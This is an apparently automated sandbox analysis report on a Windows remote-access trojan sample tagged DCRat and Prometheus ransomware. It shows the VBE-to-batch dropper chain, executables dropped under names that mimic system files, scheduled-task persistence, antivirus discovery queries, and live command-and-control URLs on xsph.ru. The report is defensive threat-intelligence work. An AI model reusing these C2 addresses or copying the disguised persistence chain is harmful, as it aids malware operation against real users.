            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCode function: 0_2_0018F22B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0018F22B
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCode function: 0_2_0019866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0019866F
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCode function: 0_2_0018EF05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0018EF05
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\bridgehyperperfdhcp\6tAgwycUZiOpR.vbe" Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\bridgehyperperfdhcp\NwRTUiiV6D2Ys0Trm6fATcEH4s25r.bat" "Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\bridgehyperperfdhcp\intoDhcp.exe "C:\bridgehyperperfdhcp\intoDhcp.exe"Jump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\GoElC7XtGN.bat" Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
            Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCode function: 0_2_0018ED5B cpuid 0_2_0018ED5B
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_0018A63C
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeQueries volume information: C:\bridgehyperperfdhcp\intoDhcp.exe VolumeInformationJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeQueries volume information: C:\Program Files\Windows Portable Devices\Idle.exe VolumeInformationJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeQueries volume information: C:\Program Files\Windows Portable Devices\Idle.exe VolumeInformationJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeQueries volume information: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe VolumeInformation
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeQueries volume information: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe VolumeInformation
            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCode function: 0_2_0018D5D4 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_0018D5D4
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCode function: 0_2_0017ACF5 GetVersionExW,0_2_0017ACF5
            Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: Idle.exe, 00000015.00000002.1867010896.000000001B760000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Program Files\Windows Portable Devices\Idle.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
            Source: C:\Program Files\Windows Portable Devices\Idle.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

            Stealing of Sensitive Information

            barindex
            Yara detected DCRat
            Source: Yara matchFile source: 00000004.00000002.1750999526.0000000003622000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.1857787065.0000000002611000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1750999526.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.1838389619.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.1838727941.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000002.1838303042.00000000034A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1752275310.00000000132DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: intoDhcp.exe PID: 7860, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Idle.exe PID: 8136, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Idle.exe PID: 8168, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: OjTEkrTlLyhdt.exe PID: 7232, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: OjTEkrTlLyhdt.exe PID: 3060, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected DCRat
            Source: Yara matchFile source: 00000004.00000002.1750999526.0000000003622000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.1857787065.0000000002611000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1750999526.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.1838389619.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.1838727941.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000002.1838303042.00000000034A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1752275310.00000000132DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: intoDhcp.exe PID: 7860, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Idle.exe PID: 8136, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Idle.exe PID: 8168, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: OjTEkrTlLyhdt.exe PID: 7232, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: OjTEkrTlLyhdt.exe PID: 3060, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information11
            Scripting            		Valid Accounts241
            Windows Management Instrumentation            		1
            Scheduled Task/Job            		11
            Process Injection            		113
            Masquerading            		OS Credential Dumping1
            System Time Discovery            		Remote Services11
            Archive Collected Data            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts2
            Command and Scripting Interpreter            		11
            Scripting            		1
            Scheduled Task/Job            		1
            Disable or Modify Tools            		LSASS Memory261
            Security Software Discovery            		Remote Desktop ProtocolData from Removable Media1
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            Scheduled Task/Job            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		151
            Virtualization/Sandbox Evasion            		Security Account Manager1
            Process Discovery            		SMB/Windows Admin SharesData from Network Shared Drive2
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
            Process Injection            		NTDS151
            Virtualization/Sandbox Evasion            		Distributed Component Object ModelInput Capture12
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Deobfuscate/Decode Files or Information            		LSA Secrets1
            Application Window Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
            Obfuscated Files or Information            		Cached Domain Credentials2
            File and Directory Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items22
            Software Packing            		DCSync57
            System Information Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1581448 Sample: rWjaZEKha8.exe Startdate: 27/12/2024 Architecture: WINDOWS Score: 100 57 a1067345.xsph.ru 2->57 59 Found malware configuration 2->59 61 Antivirus detection for URL or domain 2->61 63 Antivirus detection for dropped file 2->63 65 11 other signatures 2->65 11 rWjaZEKha8.exe 3 6 2->11         started        14 OjTEkrTlLyhdt.exe 2->14         started        17 Idle.exe 14 2 2->17         started        20 2 other processes 2->20 signatures3 process4 dnsIp5 43 C:\bridgehyperperfdhcp\intoDhcp.exe, PE32 11->43 dropped 45 C:\bridgehyperperfdhcp\6tAgwycUZiOpR.vbe, data 11->45 dropped 22 wscript.exe 1 11->22         started        77 Multi AV Scanner detection for dropped file 14->77 55 a1067345.xsph.ru 141.8.197.42, 49730, 49732, 80 SPRINTHOSTRU Russian Federation 17->55 file6 signatures7 process8 signatures9 67 Windows Scripting host queries suspicious COM object (likely to drop second stage) 22->67 25 cmd.exe 1 22->25         started        process10 process11 27 intoDhcp.exe 3 26 25->27         started        31 conhost.exe 25->31         started        file12 47 C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe, PE32 27->47 dropped 49 C:\Users\user\OjTEkrTlLyhdt.exe, PE32 27->49 dropped 51 C:\Users\user\3D Objects\OjTEkrTlLyhdt.exe, PE32 27->51 dropped 53 8 other malicious files 27->53 dropped 69 Antivirus detection for dropped file 27->69 71 Multi AV Scanner detection for dropped file 27->71 73 Machine Learning detection for dropped file 27->73 75 3 other signatures 27->75 33 cmd.exe 27->33         started        35 schtasks.exe 27->35         started        37 schtasks.exe 27->37         started        39 31 other processes 27->39 signatures13 process14 process15 41 conhost.exe 33->41         started       

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            rWjaZEKha8.exe74%ReversingLabsByteCode-MSIL.Trojan.Uztuby
            rWjaZEKha8.exe100%AviraVBS/Runner.VPG
            rWjaZEKha8.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Program Files\MSBuild\OjTEkrTlLyhdt.exe100%AviraHEUR/AGEN.1323984
            C:\Program Files\MSBuild\OjTEkrTlLyhdt.exe100%AviraHEUR/AGEN.1323984
            C:\Program Files\MSBuild\OjTEkrTlLyhdt.exe100%AviraHEUR/AGEN.1323984
            C:\bridgehyperperfdhcp\intoDhcp.exe100%AviraHEUR/AGEN.1323984
            C:\Program Files\MSBuild\OjTEkrTlLyhdt.exe100%AviraHEUR/AGEN.1323984
            C:\Users\user\AppData\Local\Temp\GoElC7XtGN.bat100%AviraBAT/Delbat.C
            C:\Program Files (x86)\Microsoft Office\dasHost.exe100%AviraHEUR/AGEN.1323984
            C:\Program Files\MSBuild\OjTEkrTlLyhdt.exe100%AviraHEUR/AGEN.1323984
            C:\bridgehyperperfdhcp\6tAgwycUZiOpR.vbe100%AviraVBS/Runner.VPG
            C:\Program Files (x86)\Mozilla Maintenance Service\TextInputHost.exe100%AviraHEUR/AGEN.1323984
            C:\Program Files\MSBuild\OjTEkrTlLyhdt.exe100%AviraHEUR/AGEN.1323984
            C:\Program Files\Windows Portable Devices\upfc.exe100%AviraHEUR/AGEN.1323984
            C:\Program Files\Windows Portable Devices\Idle.exe100%AviraHEUR/AGEN.1323984
            C:\Program Files\MSBuild\OjTEkrTlLyhdt.exe100%Joe Sandbox ML
            C:\Program Files\MSBuild\OjTEkrTlLyhdt.exe100%Joe Sandbox ML
            C:\Program Files\MSBuild\OjTEkrTlLyhdt.exe100%Joe Sandbox ML
            C:\bridgehyperperfdhcp\intoDhcp.exe100%Joe Sandbox ML
            C:\Program Files\MSBuild\OjTEkrTlLyhdt.exe100%Joe Sandbox ML
            C:\Program Files (x86)\Microsoft Office\dasHost.exe100%Joe Sandbox ML
            C:\Program Files\MSBuild\OjTEkrTlLyhdt.exe100%Joe Sandbox ML
            C:\Program Files (x86)\Mozilla Maintenance Service\TextInputHost.exe100%Joe Sandbox ML
            C:\Program Files\MSBuild\OjTEkrTlLyhdt.exe100%Joe Sandbox ML
            C:\Program Files\Windows Portable Devices\upfc.exe100%Joe Sandbox ML
            C:\Program Files\Windows Portable Devices\Idle.exe100%Joe Sandbox ML
            C:\Program Files (x86)\Microsoft Office\dasHost.exe76%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\Program Files (x86)\Mozilla Maintenance Service\TextInputHost.exe76%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\Program Files\MSBuild\OjTEkrTlLyhdt.exe76%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\Program Files\Windows Mail\OjTEkrTlLyhdt.exe76%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\Program Files\Windows Portable Devices\Idle.exe76%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\Program Files\Windows Portable Devices\OjTEkrTlLyhdt.exe76%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\Program Files\Windows Portable Devices\upfc.exe76%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\Users\user\3D Objects\OjTEkrTlLyhdt.exe76%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\Users\user\OjTEkrTlLyhdt.exe76%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe76%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\bridgehyperperfdhcp\intoDhcp.exe76%ReversingLabsByteCode-MSIL.Ransomware.Prometheus

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://a1067345.xsph.ru/100%Avira URL Cloudmalware
            http://a1067345.xsph.ru/L1nc0In.php?mkn6LdkjNAa3q=3Nmq&cUBN7q5c487P5k4KRJAd=akB0oT9Zs0Tfb7BlWpQ&839eee19f6966bfbabe4900b624161e8=2eaac4e162c4e7f7852177bf13b5969e&4942500b55a6a4fa595356f0cbfe4b94=QYzQ2MwITO0gzMlFTMxI2MjdTYkljYmJTOjZGO1I2YxYTMidjYhRGO&mkn6LdkjNAa3q=3Nmq&cUBN7q5c487P5k4KRJAd=akB0oT9Zs0Tfb7BlWpQ100%Avira URL Cloudmalware
            http://a1067345.xsph.ru100%Avira URL Cloudmalware
            http://a1067345.xsph.ru/L1nc0In.php?mkn6LdkjNAa3q=3Nmq&cUBN7q5c487P5k4KRJAd=akB0oT9Zs0Tfb7BlWpQ&839e100%Avira URL Cloudmalware

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            a1067345.xsph.ru
            		141.8.197.42
            		truefalse
              		unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://a1067345.xsph.ru/L1nc0In.php?mkn6LdkjNAa3q=3Nmq&cUBN7q5c487P5k4KRJAd=akB0oT9Zs0Tfb7BlWpQ&839eee19f6966bfbabe4900b624161e8=2eaac4e162c4e7f7852177bf13b5969e&4942500b55a6a4fa595356f0cbfe4b94=QYzQ2MwITO0gzMlFTMxI2MjdTYkljYmJTOjZGO1I2YxYTMidjYhRGO&mkn6LdkjNAa3q=3Nmq&cUBN7q5c487P5k4KRJAd=akB0oT9Zs0Tfb7BlWpQfalse
              • Avira URL Cloud: malware
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://a1067345.xsph.ruIdle.exe, 00000015.00000002.1857787065.00000000027D8000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 00000015.00000002.1857787065.00000000027D0000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://a1067345.xsph.ru/L1nc0In.php?mkn6LdkjNAa3q=3Nmq&cUBN7q5c487P5k4KRJAd=akB0oT9Zs0Tfb7BlWpQ&839eIdle.exe, 00000015.00000002.1857787065.00000000027AF000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 00000015.00000002.1857787065.00000000027D8000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 00000015.00000002.1867010896.000000001B7B5000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameintoDhcp.exe, 00000004.00000002.1750999526.0000000003644000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 00000015.00000002.1857787065.00000000027AF000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://a1067345.xsph.ru/Idle.exe, 00000015.00000002.1857787065.00000000027A3000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                141.8.197.42
                		a1067345.xsph.ruRussian Federation
                		35278SPRINTHOSTRUfalse

                General Information

                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1581448
                Start date and time:2024-12-27 18:31:06 +01:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 7m 57s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:44
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:rWjaZEKha8.exe
                renamed because original name is a hash value
                Original Sample Name:5D579285E5EFDF6DE25DA8D83D7AA9BE.exe
                Detection:MAL
                Classification:mal100.troj.evad.winEXE@51/28@1/1
                EGA Information:
                • Successful, ratio: 16.7%
                HCA Information:
                • Successful, ratio: 60%
                • Number of executed functions: 446
                • Number of non-executed functions: 93
                Cookbook Comments:
                • Found application associated with file extension: .exe

                Warnings

                • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.63
                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                • Execution Graph export aborted for target Idle.exe, PID 8136 because it is empty
                • Execution Graph export aborted for target Idle.exe, PID 8168 because it is empty
                • Execution Graph export aborted for target OjTEkrTlLyhdt.exe, PID 3060 because it is empty
                • Execution Graph export aborted for target OjTEkrTlLyhdt.exe, PID 7232 because it is empty
                • Execution Graph export aborted for target intoDhcp.exe, PID 7860 because it is empty
                • Not all processes where analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size exceeded maximum capacity and may have missing disassembly code.
                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • VT rate limit hit for: rWjaZEKha8.exe

                Simulations

                Behavior and APIs

                TimeTypeDescription
                12:32:14API Interceptor15x Sleep call for process: Idle.exe modified
                17:32:03Task SchedulerRun new task: Idle path: "C:\Program Files\Windows Portable Devices\Idle.exe"
                17:32:03Task SchedulerRun new task: IdleI path: "C:\Program Files\Windows Portable Devices\Idle.exe"
                17:32:03Task SchedulerRun new task: OjTEkrTlLyhdt path: "C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe"
                17:32:04Task SchedulerRun new task: OjTEkrTlLyhdtO path: "C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe"
                17:32:06Task SchedulerRun new task: dasHost path: "C:\Program Files (x86)\microsoft office\dasHost.exe"
                17:32:06Task SchedulerRun new task: dasHostd path: "C:\Program Files (x86)\microsoft office\dasHost.exe"
                17:32:07Task SchedulerRun new task: TextInputHost path: "C:\Program Files (x86)\mozilla maintenance service\TextInputHost.exe"
                17:32:07Task SchedulerRun new task: TextInputHostT path: "C:\Program Files (x86)\mozilla maintenance service\TextInputHost.exe"
                17:32:07Task SchedulerRun new task: upfc path: "C:\Program Files\Windows Portable Devices\upfc.exe"
                17:32:07Task SchedulerRun new task: upfcu path: "C:\Program Files\Windows Portable Devices\upfc.exe"

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                141.8.197.4201US71QGnu.exeGet hashmaliciousUnknownBrowse
                • a1023269.xsph.ru/yhjjk.exe
                01US71QGnu.exeGet hashmaliciousUnknownBrowse
                • a1023269.xsph.ru/yhjjk.exe
                LisectAVT_2403002A_442.exeGet hashmaliciousDCRatBrowse
                • a0583448.xsph.ru/HttpCpu.php?YTh3ufPQGcMG3QNXqrKTUZNjJDX=qmsyYKg8QxN&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=QZzADZhdjZxIGO4QDO0ITOyUDMjdjNwYzN3YjNiZDOilzN2AjN0EGO&YTh3ufPQGcMG3QNXqrKTUZNjJDX=qmsyYKg8QxN
                PMDfwr7Jal.exeGet hashmaliciousDCRatBrowse
                • a0583448.xsph.ru/HttpCpu.php?Etdqn=ESdpfxAWldlPKJ94kNlqAXCtp&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=AMkVmY1cDNihjYmNDZmFzYjFTOwU2Y3YDZ4QjMjRWMzIWNxIWO1M2N&Etdqn=ESdpfxAWldlPKJ94kNlqAXCtp
                quotation.docGet hashmaliciousUnknownBrowse
                • a0862680.xsph.ru/djlipantro2.1.exe
                HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exeGet hashmaliciousBlackNETBrowse
                • f0575824.xsph.ru/blacknet/receive.php?command=VW5pbnN0YWxs&vicID=SGFjS2VkXzdGOTRDM0I1
                442.111).lnkGet hashmaliciousUnknownBrowse
                • a0705880.xsph.ru/selection/seedling.txt
                htmlayout.dllGet hashmaliciousUnknownBrowse
                • a0747694.xsph.ru/serv.php
                qRsw2oZH24.exeGet hashmaliciousPanda StealerBrowse
                • crimestreetsru.ru.xsph.ru/collect.php
                svchost.exeGet hashmaliciousPanda StealerBrowse
                • asdqwezxc.ru.xsph.ru/collect.php

                Domains

                No context

                ASNs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                SPRINTHOSTRUfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, StealcBrowse
                • 185.185.71.170
                aweqG2ssAY.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                • 185.185.71.170
                vOizfcQSGf.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                • 185.185.71.170
                EnoSY3z6MP.exeGet hashmaliciousCryptbotBrowse
                • 185.185.71.170
                vH7JfdNi3c.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                • 185.185.71.170
                U6mwWZlkzH.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                • 185.185.71.170
                KzLv0EXDs1.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                • 185.185.71.170
                JiZQEd33mn.exeGet hashmaliciousUnknownBrowse
                • 185.185.71.170
                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, StealcBrowse
                • 185.185.71.170
                SAc3W2GkMS.exeGet hashmaliciousCryptbotBrowse
                • 185.185.71.170

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                C:\Program Files (x86)\Microsoft Office\21b1a557fd31cc

                Download File
                Process:C:\bridgehyperperfdhcp\intoDhcp.exe
                File Type:ASCII text, with very long lines (560), with no line terminators
                Category:dropped
                Size (bytes):560
                Entropy (8bit):5.8681403265010275
                Encrypted:false
                SSDEEP:6:OjzEcgA/cyOcR1vRRU0sXl3MQB2oxJEWxY0JPQgjcEb09Adbe2xp2fdDZwKQTbmL:OjRZU7oUFfBJPfbDbWBGzPm/AsMeX
                MD5:7CFB039E41A179275967CF71C34B7118
                SHA1:4E8EE725A3BC41B256863F529F79E370152ABB77
                SHA-256:0A77CC9366571ACD0DD343215067864EC646ED4C4724A2A456DCEAF085055175
                SHA-512:017099A3B42550053E3CCC1D955A7F679763E9CE7BBD966591D9CCDA5FEFA9C347005A61EFE379D4C5817ECC3A202B48CC440B53F6F3F7B676F57E150EDCAE64
                Malicious:false
                Preview:2AcZA9kOgCpGKpKZyMZEifiVn4ZQxkJACZy8Yzlhx1InctWNH3RSwP9WcGwFjUa63oEv1LA8k1QrX423hMJ4S1OxZcgRDg7daMuxolW53Sr48R8hO2hXKgnCaRVYps5E3xRLKFO6zOB9JTzHd9DK8kS4irWXP7PKXmBKAxXInlh6en2HcN5qouGTeWmcs0q280mhRoHpm5hWCWZ4zP5BCjgmfsqnK4aw4p7oBVzxGPEtNtRH7snc5o0YT9Bj7dfreubWYu3eZH5xfxZvbiqcR71QzjUCTQ0mtWOcS4sMzJDxtD3gjPIYxCZg2LhzZ1KJRSDIi6dgzdnI4EhwpycDIbyq6skGX3w884fa9u7nwljUZRmxovKlYHA0dWM0WWJ6qpJAjGw50yRg1eRpFwcltLj13o6niHQZcmnuHmOh8Oukze88Eguk4hNfGSG4KIWti1DP1hhdh5nea9BYp7iBWqf5YHnzfTX02BB7btHh9QC84tFHQsPMjVW1WI0t3r8OhwmY7E760BBGogApCgjwEKQhpKlS2XnSSybHHqKMvSWhTQN0

                C:\Program Files (x86)\Microsoft Office\dasHost.exe

                Download File
                Process:C:\bridgehyperperfdhcp\intoDhcp.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):1344000
                Entropy (8bit):7.058639105961635
                Encrypted:false
                SSDEEP:24576:wSohNy3mNDK0ydmlrx5YjqPqykyxovSzWKopkOu8L:toKmNxYwbkyoK6KqTu8
                MD5:889D38A4230664BEFDBB3D1528E08DF2
                SHA1:A1BFE5EFCC301E2D5C66847CD730426BB641761E
                SHA-256:21D8F3CF705420CBD00EE7466F3F7EAAA98323F111750ABEF9B4C88CEEB6218C
                SHA-512:2DFE0A543E90E6D41A589B1DB392F3FD384F35EE255BC6AA2A6BB3C58CB4B9763D05D2CEBCCEFF83A891C4C7B4B3D2DC4821F0EE4219CE576460DD1A93D73254
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: ReversingLabs, Detection: 76%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................H...6......>f... ........@.. ....................................@..................................e..K.................................................................................... ............... ..H............text...DF... ...H.................. ..`.sdata.../.......0...L..............@....rsrc................|..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                C:\Program Files (x86)\Mozilla Maintenance Service\22eafd247d37c3

                Download File
                Process:C:\bridgehyperperfdhcp\intoDhcp.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):75
